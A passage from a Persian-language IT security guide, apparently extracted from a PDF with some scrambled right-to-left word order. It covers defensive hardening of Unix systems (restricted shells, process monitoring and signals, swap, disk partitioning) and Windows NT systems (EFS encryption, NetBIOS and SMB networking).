ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﺮﺩﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﮐﺎﺭﺑﺮﻱ ﭘﻴﺶﻓﺮﺽ ﻭ ﻣﻬﻤﺎﻥ ﺍﻗﺪﺍﻡ ﻣﻨﺎﺳﺒﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﺍﮔﺮ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻫﺴﺘﻴﺪ ،ﺍﺯ ﭘﻮﺳﺘﻪﻫـﺎﻱ
٣٥٢
ﻣﺤﺪﻭﺩﺷﺪﻩ rshﻳﺎ rbashﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﺟﺮﺍﻱ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﺷﻨﺪ )ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺑﺎ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﭘﻮﺳﺘﻪ ﺭﺍﻩ ﺩﻭﺭ
ﺑﻪ ﻧﺎﻡ rshﺍﺷﺘﺒﺎﻩ ﻧﮕﻴﺮﻳﺪ( .ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺁﻥ ﺩﺳﺘﻮﺭﺍﺕ ،ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﭘﻮﺳﺘﻪﻫﺎﻱ ﻧﺎﻣﺤﺪﻭﺩ )ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻭﻳﺮﺍﻳـﺸﮕﺮﻫﺎ
ﺩﺍﺭﻧﺪ( ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﭘﺮﺩﺍﺯﻩﻫﺎ ﻭ ﺣﺎﻓﻈﻪ
psﻭ ﺩﺭ ﻧـﺴﺨﻪﻫـﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺩﺳﺘﻮﺭ psﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ
)ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ،BSDﺩﺳـﺘﻮﺭ –auxw
،SVR5ﺩﺳﺘﻮﺭ .(ps –elfﻫﺮ ﭘﺮﺩﺍﺯﻩ ﻳﻚ "ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﭘﺮﺩﺍﺯﻩ" ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺩﺳﺘﻮﺭﺍﺗﻲ ﻛﻪ ﺑﺎ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﺷﻮﺩ.
ﻣﺮﺍﻗﺐ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﺷﻴﺪ .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻣﺎﻧﻨﺪ topﻭ lsofﺑﻪ ﻃﻮﺭ ﻣﻨﻈﻢ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺍﺟـﺮﺍ ﺩﺭ
ﺳﻴﺴﺘﻢ ﻭ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛﺴﻲ ﺁﻧﻬﺎ ﺭﺍ ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ .ﺣﺴﺎﺑﺪﺍﺭﻱ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ ﺗﺎ ﺳﺎﺑﻘﺔ ﭘﺮﺩﺍﺯﻩﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺩﺭ
ﺳﻴﺴﺘﻢ ﺍﺟﺮﺍ ﺷﺪﻩﺍﻧﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺯﻣﺎﻥ ﭘﺮﺩﺍﺯﺵ ﺯﻳﺎﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﺩﺳﺘﻮﺭﺍﺕ niceﻭ reniceﺑﺮﺍﻱ ﻛﻢ ﻛﺮﺩﻥ ﺍﻭﻟﻮﻳﺖ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﻧﺪ ﻭ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ ﻃﻮﻻﻧﻲ ﭘﺲﺯﻣﻴﻨﻪ
ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ .ﻋﻼﻭ ﺑﺮ ﺁﻥ root ،ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ niceﺑﺮﺍﻱ ﺯﻳﺎﺩﻛﺮﺩﻥ ﺍﻭﻟﻮﻳﺖ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ .ﺍﻳـﻦ ﻋﻤـﻞ ﻭﻗﺘـﻲ
ﻣﻔﻴﺪ ﺍﺳﺖ ﻛﻪ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺳﺮﻋﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻛﻢ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﻭ rootﺑﻪ ﺯﻣﺎﻥ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺩﺳﺘﻮﺭ killﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﺳﻴﮕﻨﺎﻝ ﺑﻪ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﺑﺮﺧﻲ ﺳﻴﮕﻨﺎﻟﻬﺎ ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ daemonﻫﺎ ﺍﺯ ﻳﻚ ﺗﻐﻴﻴﺮ ﺩﺭ ﺳﻴـﺴﺘﻢ
ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﻳﺎ ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﮔﻮﻳﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺗﻨﻈﻴﻤﺎﺕ ﺟﺪﻳﺪ ،ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍ ﺩﻭﺑﺎﺭﻩ ﺑﺨﻮﺍﻧﻨﺪ .ﺍﺯ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﺩﻳﮕـﺮ ﻣـﻲﺗـﻮﺍﻥ
ﺑﺮﺍﻱ ﻣﻌﻠﻖ ﻛﺮﺩﻥ ﻳﺎ ﺧﺎﺗﻤﻪ ﺩﺍﺩﻥ ﺑﻪ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺳﻴﮕﻨﺎﻝ ) TERMﻛﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺑـﺎ " "kill process-idﻳـﺎ ﺻـﺮﻳﺤﹰﺎ ﺑـﺼﻮﺭﺕ
ﻻ ﭘﺮﺩﺍﺯﻩ ﺭﺍ ﺧﺎﺗﻤﻪ ﻣﻲﺩﻫﺪ؛ ﻭ ﺳﻴﮕﻨﺎﻝ killﺑﺪﻭﻥ ﻫﻴﭻ ﺷﺮﻃﻲ ﺑﻪ ﭘﺮﺩﺍﺯﻩ ﭘﺎﻳﺎﻥ ﻣﻲﺩﻫـﺪ. " "kill –TERM process-idﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ( ﻣﻌﻤﻮ ﹰ
ﺳﻴﮕﻨﺎﻝ TSTPﻳﻚ ﭘﺮﺩﺍﺯﻩ ﺭﺍ ﻣﻌﻠﻖ ﻣﻲﻛﻨﺪ ،ﻭ ﻭﻗﺘﻲ ﻣﻔﻴﺪ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﻫﺪﻑ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺣﺎﻓﻈـﻪ ﭘـﺮﺩﺍﺯﻩ ﺑـﺎ
ﺩﺳﺘﻮﺭ gcoreﺑﮕﻴﺮﻳﺪ ،ﻳﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺮﺩﺍﺯﻩﻫﺎﻳﻲ ﻛﻪ ﺧﻮﺩ ﺭﺍ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ ﺗﻤﺎﻡ ﻓﻀﺎﻱ ﭘﺮﺩﺍﺯﻩﻫـﺎ ﺭﺍ ﭘـﺮ ﻛـﺮﺩﻩ ﺑﺎﺷـﻨﺪ .ﺩﺭ ﻣـﻮﺭﺩ ﺩﻭﻡ،
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺑﺘﺪﺍ ﻫﺮ ﭘﺮﺩﺍﺯﻩ ﺭﺍ ﻣﻌﻠﻖ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﻫﻤﻪ ﺭﺍ ﻳﻜﺠﺎ ﺑﻜﺸﻴﺪ ،ﻃﻮﺭﻳﻜﻪ ﺩﻳﮕﺮ ﻧﺘﻮﺍﻧﻨﺪ ﺗﺨﻢﺭﻳﺰﻱ ﻭ ﺗﻮﻟﻴﺪﻣﺜﻞ ﻛﻨﻨﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﺍﺯ ﺣﺎﻓﻈﻪ ﻣﺠﺎﺯﻱ )ﻛﻪ ﺍﺯ ﻗﺪﻳﻢ ﺑﻪ ﻓﻀﺎﻱ swapﻣﻌﺮﻭﻑ ﺍﺳﺖ( ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨﻨـﺪ .ﻭﻗﺘـﻲ ﭘـﺮﺩﺍﺯﻩﻫـﺎﻱ ﺩﺭﻭﻥ ﺳﻴـﺴﺘﻢ
ﺣﺎﻓﻈﻪﺍﻱ ﺑﻴﺸﺘﺮ ﺍﺯ RAMﻣﻮﺟﻮﺩ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ،ﻓﻀﺎﻳﻲ ﺍﺯ ﺩﻳﺴﻚ ﻛﻪ ﺑﻪ swapﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷـﻮﺩ .ﻣﺮﺍﻗـﺐ
ﺑﺎﺷﻴﺪ ﻛﻪ ﺭﻭﻱ partitionﻫﺎﻱ ﺩﻳﺴﻚ ﺧﻮﺩ ﻓﻀﺎﻱ swapﻛﺎﻓﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ) .ﺑﺮﺧـﻲ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ Unixﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺭﻭﻱ ﻓﺎﻳﻠﻬـﺎﻳﻲ ﺩﺭ
partitionﻫﺎﻱ ﺑﺎ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻧﻴﺰ swapﻛﻨﻨﺪ ،ﻫﺮﭼﻨﺪ ﻛﺎﺭﺍﻳﻲ ﭘﺎﻳﻴﻦ ﻣﻲﺁﻳﺪ(.
ﺩﻳﺴﻜﻬﺎ
mailﻳـﺎ ﻋﻼﻭﻩ ﺑﺮ ﺳﻴﺴﺘﻢ partition ،quotaﻫﺎﻱ ﺣﻴﺎﺗﻲ ﺭﺍ ﺍﺯ partitionﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﺎﺩﻓﹰﺎ ﻳﺎ ﻋﻤﺪﹰﺍ ﭘﺮ ﺷﻮﻧﺪ
)ﻣﺎﻧﻨﺪ spool
partitionﻫﺎﻱ ﻣﺨﺼﻮﺹ uploadﻛﺮﺩﻥ ﻓﺎﻳﻞ( ﺟﺪﺍ ﺳﺎﺯﻳﺪ .ﺩﻗﺖ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﻫﺮ ،partitionﻓﻀﺎ ﻭ inodeﻫﺎﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﻓﺎﻳﻠﻬـﺎ
ﻣﻮﺟﻮﺩ ﺑﺎﺷﺪ .ﺑﺮ ﻣﺼﺮﻑ ﺩﻳﺴﻚ ﻧﻈﺎﺭﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﻪ ﺑﺎﻳﮕﺎﻧﻲ ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎﻱ ﻗﺪﻳﻤﻲ ﺩﺭ ﺩﻳـﺴﮑﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﻭ ﻧـﻮﺭﻱ ﻭ
ﺣﺬﻑ ﺁﻧﻬﺎ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﮏ ﺳﺨﺖ ﺗﺸﻮﻳﻖ ﻛﻨﻴﺪ.
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺎ ﺗﺄﻛﻴﺪ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻧﻔﺮﺍﺩﻱ ﻭ ﺑﺪﻭﻥ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﺷﺒﻜﻪ ﺁﻏﺎﺯ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩﻧﺪ ،ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﻣﺪﺕ ﻛﻮﺗـﺎﻫﻲ
)ﺍﺑﺘﺪﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ﻭ ﺳﭙﺲ ﺑﺎ (TCP/IPﺑﺼﻮﺭﺕ ﺷﺒﻜﻪ ﻧﻴﺰ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﺪﻧﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ Windows 3.xﻭ
Windows 95/98/MEﻋﻤﻮﻣﹰﺎ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ؛ ﺑـﺮ ﺧـﻼﻑ ﺁﻥ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ
ﺑﺨﺶ ﭘﻨﺠﻢ
) Windows NTﺍﺯ ﺟﻤﻠﻪ Windows 2000ﻭ (Windows XPﻏﺎﻟﺒﹰﺎ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻛﻨﺘﺮﻟﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﺑﺴﻴﺎﺭ ﭘﻴﺸﺮﻓﺘﻪﺗﺮﻱ ﺩﺍﺭﻧﺪ ٣٥٣.ﺗﻔﺎﻭﺗﻬﺎﻱ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ Windowsﻣﻲﺗﻮﺍﻧﺪ ﻓﺎﺟﻌﻪﺁﻣﻴﺰ ﺑﺎﺷﺪ .ﺍﮔﺮ ﺩﺭ ﻣﺤﻴﻄﻲ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﺯ
ﭼﻨﺪ ﻧﮕﺎﺭﺵ ﻣﺨﺘﻠﻒ Windowsﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻫﺮ ﻧﺴﺨﻪ ﺗﻮﺟﻬﺎﺕ ﻭ ﺗﺪﺍﺑﻴﺮ ﺧـﺎﺹ ﺧـﻮﺩﺵ ﺭﺍ ﻻﺯﻡ ﺩﺍﺭﺩ .ﺍﻳـﻦ ﻗـﺴﻤﺖ ﻛﺘـﺎﺏ ﺩﺭ
ﺩﺭﺟﺔ ﺍﻭﻝ ﺑﺮ ﻣﺴﺘﺤﻜﻢ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Windows NTﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ.
ﻫﻤﺎﻧﻨﺪ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ،ﻫﻴﭻ ﭼﻴﺰ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺧﻮﺍﻧﺪﻥ ﻛﺘﺎﺑﭽﺔ ﺭﺍﻫﻨﻤﺎ ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﺷﻤﺎ ﺑﺎ Windowsﻣﻔﻴﺪ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺳﺎﻳﺮ ﻛﺘﺎﺑﻬـﺎ،
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ،ﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻣﺨﺼﻮﺹ ﺍﻣﻨﻴﺖ Windowsﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻄﺎﻟﺐ ﻏﻨﻲ ﻭ ﻓﺮﺍﻭﺍﻧـﻲ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ.
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺷﺎﻣﻞ ﻳﻚ ﺑﺨﺶ ﺑﺰﺭﮒ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺍﺳﺖ ﻛﻪ ﺩﺍﺭﺍﻱ ﻣﺴﺘﻨﺪﺍﺕ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻔﻴﺪ ﺯﻳﺎﺩﻱ ﻣﻲﺑﺎﺷﺪ ،ﺍﺯ ﺟﻤﻠﻪ
۳۵۳ﺑﺮ ﺧﻼﻑ ﺍﻧﺘﻈﺎﺭ ،ﺳﻴﺴﺘﻤﻬﺎﻱ DOSﻧﻴﺰ ﺩﺭ ﺑﻌﻀﻲ ﺷﺮﺍﻳﻂ ﺑﺮﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﮔﺰﻳﻨﺔ ﻣﻨﺎﺳﺒﻲ ﻫﺴﺘﻨﺪ .ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻫﺴﺘﻨﺪ ﻭ ﻧﻘﺎﻁ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻧﺪﻛﻲ ﺩﺍﺭﻧﺪ ،ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﻚﻣﻨﻈﻮﺭﺓ ﺛﺒﺖ ،ﭘﺎﻳﺎﻧﻪ ،ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ،ﻭ ﺣﺘﻲ DNSﮔﺰﻳﻨﺔ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳـﺒﻲ
ﻣﻲﺑﺎﺷﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٤٨
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺤﻠﻴﻠﮕﺮ ﭘﺎﻳﻪﺍﻱ ﺍﻣﻨﻴﺖ ٣٥٤ﻛﻪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ Windows NTﺭﺍ ﺗﺤﻠﻴـﻞ ﻣـﻲﻛﻨـﺪ ﻭ
ﺗﻮﺻﻴﻪﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻘﻮﻳﺖ ﺁﻥ ﻣﻲﺩﻫﺪ .ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺍﺟﺮﺍ ﻛﻨﻴﺪ.
ﺭﻣﺰﻧﮕﺎﺭﻱ
Microsoft Windowsﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﺔ ﻳﻜﭙﺎﺭﭼﻪ ﺑﻪ ﻧﺎﻡ CryptoAPIﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺭﺍﺋﻪ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺩﺭ ﺳﻴﺴﺘﻢ ﻓﺎﻳـﻞ
،NTFSﻓﺎﻳﻠﻬــﺎ ﻭ ﺷــﺎﺧﻪﻫــﺎ ﺭﺍ ﻣــﻲﺗــﻮﺍﻥ ﺑــﺎ ﺍﺑــﺰﺍﺭ cipher.exeﺭﻣﺰﮔــﺬﺍﺭﻱ ﻛــﺮﺩ ،ﻛــﻪ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﻓﺎﻳــﻞ ﺭﻣﺰﺷــﺪﺓ ﻧــﺎﻣﺮﺋﻲ
) ٣٥٦(Transparent EFSﺭﺍ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ .ﻣﺒﻨﺎﻱ EFSﺑﺮ ﭘﺎﻳﺔ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﻨﺎ ﻧﻬﺎﺩﻩ ﺷﺪﻩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑـﺎ
ﺍﺭﺍﺋﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻨﺎﺳﺐ ،ﺑﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻣﺰﺷﺪﺓ ﺧﻮﺩ ﺩﺳﺖ ﻳﺎﺑﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻲﺗﻮﺍﻥ EFSﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﺮﺩ ﻛـﻪ ﺩﺭﺻـﻮﺭﺕ
ﮔﻢ ﺷﺪﻥ ﻛﻠﻴﺪ ،ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺘﻮﺍﻧﺪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﺪ) .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻳﺎ ﻛـﺎﻫﺶ
ﺩﻫﺪ(.
ﺷﺒﻜﻪﻫﺎﻱ TCP/IP
Microsoft Windowsﺗﺎ ﻗﺒﻞ ﺍﺯ ﺭﻭﺍﺝ ﮔﺴﺘﺮﺩﺓ TCP/IPﺍﺯ ﻳﻚ ﻣﺪﻝ ﺷﺒﻜﻪﺍﻱ Ethernetﻧﻈﻴﺮ ﺑﻪ ﻧﻈﻴﺮ ٣٥٧ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛـﺮﺩ
) NetBIOSﺍﺯ ﻃﺮﻳﻖ ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ .(NetBEUIﺑﺎﻗﻴﻤﺎﻧﺪﺓ NetBIOSﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺧﺪﻣﺎﺕ ﭼﺎﭘﮕﺮﻱ ﻭ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﻳـﺪ،
ﻛﻪ ﺑﺼﻮﺭﺕ NetBIOSﺍﺯ ﻃﺮﻳﻖ ) TCP/IPﮔﺎﻩ ﻣﻌﺮﻭﻑ ﺑﻪ (NBTﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺑﻪ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳﻠﻬـﺎ ﺑﻠـﻮﻙ ﭘﻴـﺎﻡ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ) ٣٥٨(SMBﻳﺎ CIFSﻣﻲﮔﻮﻳﻨﺪRFC .ﻫﺎﻱ ﺷـﻤﺎﺭﺓ ١٠٠١ﻭ ١٠٠٢ﺑﻄـﻮﺭ ﺩﻗﻴـﻖ NetBIOSﺍﺯ ﻃﺮﻳـﻖ TCP/IPﺭﺍ
ﺗﻮﺻﻴﻒ ﻛﺮﺩﻩﺍﻧﺪ.
NetBIOSﺩﺍﺭﺍﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﺗﺸﺨﻴﺺ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻣﻲﺑﺎﺷـﺪ .ﺩﺭ ﺳـﺎﺩﻩﺗـﺮﻳﻦ ﻣـﺪﻝ ،ﻣﻴﺰﺑﺎﻧﻬـﺎﻱ
)ﮔﺮﻩﻫـﺎﻱ( NetBIOSﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ،ﻫﻤﺪﻳﮕﺮ ﺭﺍ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ﻭ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺷﺒﻜﻪ ﺛﺒـﺖ ﻣـﻲﻧﻤﺎﻳﻨـﺪ .ﺍﻳـﻦ ﺭﻭﺵ
